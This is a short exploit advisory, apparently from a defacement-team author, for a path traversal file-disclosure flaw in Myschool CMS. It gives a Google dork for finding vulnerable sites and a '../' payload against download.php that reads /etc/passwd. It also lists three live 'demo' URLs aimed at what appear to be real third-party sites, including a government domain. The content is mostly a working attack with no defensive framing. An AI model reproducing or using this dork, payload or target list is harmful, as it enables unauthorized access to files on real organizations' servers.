***************************************************
# Exploit Title: Myschool CMS LFD Vulnerability
# Google Dork: inurl:/img_anekaweb/
# Exploit: /webconfig/download.php?file=../../../../../../../../../../etc/passwd
# Vendor: https://anekaweb.com/
# Date: 11/07/2018
# Author: 0N3R1D3R
# Team: Error Violence
# Tested on: Windows 10 x64
***************************************************
[+] Search the dork in Google
[+] Give exploit in the target, ex ( http://www.target.com/download.php?file=../../../../../../../../../../etc/passwd )
[+] Open the file with text editor
***************************************************
[+] Demo Site
[+] https://anekaweb.com/myschoolv2/webconfig/download.php?file=../../../../../../../../../../etc/passwd
[+] http://jdih.dompukab.go.id/webconfig/download.php?file=../../../../../../../../../../etc/passwd
[+] http://www.liraindonesia.com/webconfig/download.php?file=../../../../../../../../../../etc/passwd
***************************************************
Thanks To Error Violence